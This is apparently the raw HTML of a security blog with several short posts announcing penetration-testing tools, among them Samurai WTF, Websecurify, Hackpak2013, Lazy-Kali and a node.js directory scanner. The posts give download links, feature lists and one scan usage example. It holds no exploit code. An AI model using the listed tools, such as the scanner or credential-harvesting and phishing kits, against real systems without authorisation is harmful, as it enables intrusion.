<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTfFaP0DG3d6VQKaFIBbsz1t7gQcr6zreb7hlMhDyBHt2VGO4kOYKM-_DIBDTOu_i-AsuAPyB-x4hp7mEmdhLCdUusuhzZNJXvTHzlNOErxPpcoee-bHRMwtfeXADrMcr3bdh4JOmf2uW/s1600/189635.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuTfFaP0DG3d6VQKaFIBbsz1t7gQcr6zreb7hlMhDyBHt2VGO4kOYKM-_DIBDTOu_i-AsuAPyB-x4hp7mEmdhLCdUusuhzZNJXvTHzlNOErxPpcoee-bHRMwtfeXADrMcr3bdh4JOmf2uW/s1600/189635.jpg" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><span style="line-height: 17px; text-align: justify;">Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.</span><span style="line-height: 18px;">.</span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></span><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"></span></span><br />
<h3 class="r" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 20px; font-weight: normal; line-height: 20px; margin: 0px; overflow: hidden; padding: 0px; text-overflow: ellipsis; white-space: nowrap;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Samurai Web Testing Framework v2.1 released</span></h3>
<span style="background-color: white;"><span style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="-webkit-tap-highlight-color: rgb(0, 119, 170); border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;"><a href="http://sourceforge.net/projects/samurai/files/latest/download?source=files" style="-webkit-tap-highlight-color: rgb(0, 119, 170); margin: 0px; outline: none; padding: 0px; vertical-align: baseline;" title="/SamuraiWTF 2.0 Branch/SamuraiWTF-2.1.vmware.zip: released on 2013-08-12 05:50:25 UTC">Download SamuraiWTF-2.1.vmware.zip (2.8 GB)</a></span></span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="-webkit-tap-highlight-color: rgb(0, 119, 170); border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;"><a href="http://sourceforge.net/projects/samurai/" style="outline: none;">Downlaod other versions</a> </span></span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><span style="border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 18px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="-webkit-tap-highlight-color: rgb(0, 119, 170); border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"><span style="font-family: Georgia, 'Times New Roman', serif;"><br /></span></span></span><span style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;"></span><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><span style="line-height: 18px;">Source- </span></span><br style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;" /><a href="http://sourceforge.net/projects/samurai/" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;">http://sourceforge.net/projects/samurai/</span></a></span></div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-54394715586149644382013-09-02T14:12:00.001-07:002013-09-02T14:12:43.241-07:00Websecurify Security Testing Runtime - powerful web application security testing platform<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 20px; margin-top: 20px; max-width: 80em; padding-left: 0.7em; white-space: pre-wrap;">
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">Websecurify Security Testing Runtime </span></span>
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">Websecurify is a powerful web application security testing platform designed from the ground up to provide the best combination of automatic and manual vulnerability testing technologies. </span></span>
<span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">
</span></span><span style="background-color: #333333; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 20px; white-space: normal;"></span><span style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 23px; text-align: justify; white-space: normal;"><span style="font-family: Georgia, 'Times New Roman', serif;">Some of the main features of Websecurify include: Available for all major operating systems (Windows, Mac OS, Linux) including mobile devices (iPhone, Android) Simple to use user interface Built-in internationalization support Easily extensible with the help of add-ons and plugins Moduler and reusable design based on the Weaponry Framework Powerful manual testing tools and helper facilities Powerful analytical and scanning technology</span></span>
<div class="separator" style="background-color: #333333; clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 20px; text-align: center; white-space: normal;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLmgi54mcuHrPiUlE5V2eE7wLroJcafN8bjVnhfkd4JrNl5JR_w_RnfO9vkuyAmz2CIaxQ3fd1B1eGVmdgojNlRpJg1Jvq9pp2gCi_qwbeE-wxcIcMk1LqezxN912qQyWVOcRFbcLgCJg_/s1600/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="197" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLmgi54mcuHrPiUlE5V2eE7wLroJcafN8bjVnhfkd4JrNl5JR_w_RnfO9vkuyAmz2CIaxQ3fd1B1eGVmdgojNlRpJg1Jvq9pp2gCi_qwbeE-wxcIcMk1LqezxN912qQyWVOcRFbcLgCJg_/s1600/screenshot.png" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: none; padding: 0px;" width="320" /></span></span></a></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Websecurify is a commercial product but we are committed to support our open-source version, which you will be able to find in the <a href="http://code.google.com/p/websecurify/Downloads/list" rel="nofollow" style="outline: none;">downloads section</a> of this website. For more options just visit <a href="http://www.websecurify.com/" rel="nofollow" style="outline: none;">http://www.websecurify.com</a>.</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">
</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">If you just want a quick test without installing any additional software on our computer, just visit our online <a href="https://suite.websecurify.com/" rel="nofollow" style="outline: none;">Suite</a>. This is really the quickest way to test your application for security vulnerabilities and it is free.</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">
</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Download -</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<a href="https://code.google.com/p/websecurify/downloads/list" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/websecurify/downloads/list</span></span></a></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">
</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<span style="font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="background-color: white; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; line-height: 1.25em; max-width: 64em; white-space: normal;">
<a href="https://code.google.com/p/websecurify/" style="outline: none;"><span style="font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/websecurify/</span></span></a></div>
</pre>
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-80674935103412975322013-09-02T14:10:00.001-07:002013-09-02T14:10:38.097-07:00Hackpak2013 - collection of pentesting scripts.<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">To run specific file:</span></div>
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">python file.py</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">perl file.pl</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Need to run php files on browser.</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
</div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Other versions of:</span></div>
<ol style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/secscan-py/" rel="nofollow" style="outline: none;">SecScan/SecS/SecL</a> (the only different of SecScan is this link has updated UI version)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/puppy-pl/" rel="nofollow" style="outline: none;">Puppy</a> (Updated UI only)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/lafuzz/" rel="nofollow" style="outline: none;">Lafuzz</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/bunny-pl/" rel="nofollow" style="outline: none;">Bunny</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/leviathan-toolkit/" rel="nofollow" style="outline: none;">Leviathan</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/slowql/" rel="nofollow" style="outline: none;">Slowql</a> (old)</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://code.google.com/p/raven-py/" rel="nofollow" style="outline: none;">Raven</a> (unreleased/new)</span></li>
</ol>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">For support, contact innosec.tk@gmail.com</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="https://code.google.com/p/hackpak2013/downloads/list" style="outline: none;">Download</a>s -</span></div>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;"><a href="https://hackpak2013.googlecode.com/files/hackpak2013-v1.5.zip" style="outline: none;">hackpak2013-v1.5.zip</a></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 20px; margin-top: 20px; max-width: 80em; padding-left: 0.7em; white-space: pre-wrap;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">HackPak2013 version 1.5 includes:
- Newer version of SecScan & Puppy.pl
- Resources such as common tables & columns.
- Raw scripts on unfinished tool for learning.
- Custom exploits</span></pre>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWNMXIoQkNKIh3jQRyKQ_auTuyFKs9d3jnvNQ-PCYV_IVioZSRIafModCk5cptK_TWhQymSqn9UbykMyihIQ_dSkB-YH96U3Bj78uVZgppy4lP2SRzWmG-6d_mkWfTBEFMDj1012jZ52IX/s1600/5bfj9.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWNMXIoQkNKIh3jQRyKQ_auTuyFKs9d3jnvNQ-PCYV_IVioZSRIafModCk5cptK_TWhQymSqn9UbykMyihIQ_dSkB-YH96U3Bj78uVZgppy4lP2SRzWmG-6d_mkWfTBEFMDj1012jZ52IX/s1600/5bfj9.jpg" style="border: none; padding: 0px;" width="395" /></span></span></a></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></div>
<div style="line-height: 1.25em; max-width: 64em;">
<a href="https://code.google.com/p/hackpak2013/" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">https://code.google.com/p/hackpak2013/</span></span></a></div>
</div>
</div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-82658262065669850922013-09-02T14:09:00.003-07:002013-09-02T14:09:50.347-07:00Lazy-Kali Bash Script - a bash script for Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ROV2lCv3HWMHizgoHyRYjuyFfWW6Z8vC0OadQVWfQzd2ogdgbGm2WAgHdZD-Meo_qgY2Ne0bxUow8y6bPEI-6sbyac4P3anU0wVsDx0nXGGt4FHnouJAhv37WMa8Cv-PIQkvgIeu162n/s1600/kali-3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; color: black;"><img border="0" height="260" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh9ROV2lCv3HWMHizgoHyRYjuyFfWW6Z8vC0OadQVWfQzd2ogdgbGm2WAgHdZD-Meo_qgY2Ne0bxUow8y6bPEI-6sbyac4P3anU0wVsDx0nXGGt4FHnouJAhv37WMa8Cv-PIQkvgIeu162n/s1600/kali-3.jpg" style="border: none; padding: 0px;" width="400" /></span></a></div>
<h1 style="background-image: none; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: x-large; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Lazy-Kali Bash Script</span></h1>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
</div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">A bash script for when you feel lazy.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Adds quite a few tools to Kali Linux.</span></div>
<ul style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Bleeding Edge Repos</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">AngryIP Scanner</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Terminator</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Xchat</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Unicornscan</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Nautilus Open Terminal</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Simple-Ducky</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Subterfuge</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Ghost-Phisher</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Yamas</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">PwnStar</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Ettercap0.7.6</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Xssf</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Smbexec</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Flash</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Java</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Easy-Creds</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Java</span></li>
</ul>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">... and more!</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Lazy-Kali will also update Kali, Start Metaploit Services, Start Stop And Update Open-Vas</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">This is the first version, script is self updating so more will be added in a short time. Will try to add requested features.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><br /></span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="https://code.google.com/p/lazykali/downloads/list" style="outline: none;">Download</a>s -</span></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px; outline: none;"><a href="https://lazykali.googlecode.com/files/hackpack.tar.gz" style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; outline: none;">hackpack.tar.gz</a></span></span><br />
<div>
<br /></div>
</div>
Fahimhttp://www.blogger.com/profile/06549473576655561875noreply@blogger.com0tag:blogger.com,1999:blog-3265662506015756178.post-27153506277572482362013-09-02T14:09:00.000-07:002013-09-02T14:09:13.202-07:00Dirscan-node - Web directory scanning tool for pentesters<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Web directory scanning tool, powered by node.js</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">This tool is useful for pentesters, to identify interesting web files and directories, that could open attack vectors to the target on the audited site.</span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span></div>
<h1 style="background-image: none; border: 0px; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Installation</span></h1>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">Install node.js from: <a href="http://nodejs.org/download/" style="outline: none;">http://nodejs.org/download/</a><br /><br />chmod 755 dirscan.js<br /><br />and go!</span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;"><br /><span style="font-family: Georgia, 'Times New Roman', serif;">Usage :</span></span><blockquote style="margin: 20px; max-width: 60em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">./dirscan.js URL Wordlist Extensions</span></blockquote>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">example:</span></div>
<blockquote style="margin: 20px; max-width: 60em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">./dirscan.js <a href="http://site.com/" rel="nofollow" style="outline: none;">http://site.com/</a> wordlists/dirs.txt '.php,.sql'</span></blockquote>
<h1 style="background-image: none; border: 0px; font-size: 40px; font-weight: normal; line-height: 1; margin-bottom: 16px; margin-top: 0px; max-width: 700px; padding-left: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;"><a href="http://santoshdudhade.blogspot.com/2013/08/dirscan-node-web-directory-scanning.html" name="Details" style="outline: none;"></a>Details</span></h1>
<div style="line-height: 1.25em; max-width: 64em;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Main features:</span></div>
<ul style="margin: 0px 20px 20px 0px; max-width: 62em; padding-left: 25px;">
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">wordlist based scan</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">recursive web scanning</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">multiples extensions</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">directory listing support</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">full detailed output</span></li>
<li style="margin-bottom: 0.3em;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">colored output</span></li>
